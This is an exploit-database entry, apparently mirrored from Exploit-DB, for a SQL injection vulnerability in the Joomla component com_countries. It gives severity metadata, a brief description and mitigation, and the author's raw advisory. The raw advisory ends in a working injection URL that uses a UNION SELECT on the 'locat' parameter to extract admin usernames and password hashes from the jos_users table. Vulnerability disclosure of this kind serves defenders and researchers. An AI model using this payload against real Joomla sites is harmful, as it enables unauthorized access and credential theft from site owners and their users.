header-logo
Suggest Exploit
vendor:
com_countries
by:
FL0RiX
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: com_countries
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Joomla Component com_countries SQL Injection Vulnerability

An attacker can exploit this vulnerability to gain access to admin login credentials by sending a malicious SQL query to the vulnerable parameter 'locat' in the URL. The malicious query is concatenated with the username and password of the admin user from the jos_users table.

Mitigation:

Input validation should be implemented to filter out malicious characters.
Source

Exploit-DB raw data:

<------------------- header data start ------------------- >

#############################################################
#        Joomla Component com_countries  SQL Injection Vulnerability
#############################################################

# Author          : FL0RiX

# Name            : com_countries

# Greez           : Deep-Power, PyskE,Septemb0x,KaCaK

# Bug Type        : SQL Injection

# Infection       : Admin login bilgileri alinabilir.

# Demo Vuln.      :

http://server/index.php?option=com_countries&locat=[SQL INJ.]

# Bug Fix Advice : Zararli karakterler filtrelenmelidir.

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

path/index.php?option=com_countries&locat=null/**/union/**/select/**/concat(username,0x3a,password)fl0f0r3v3r/**/from/**/jos_users

< -- bug code end of -- >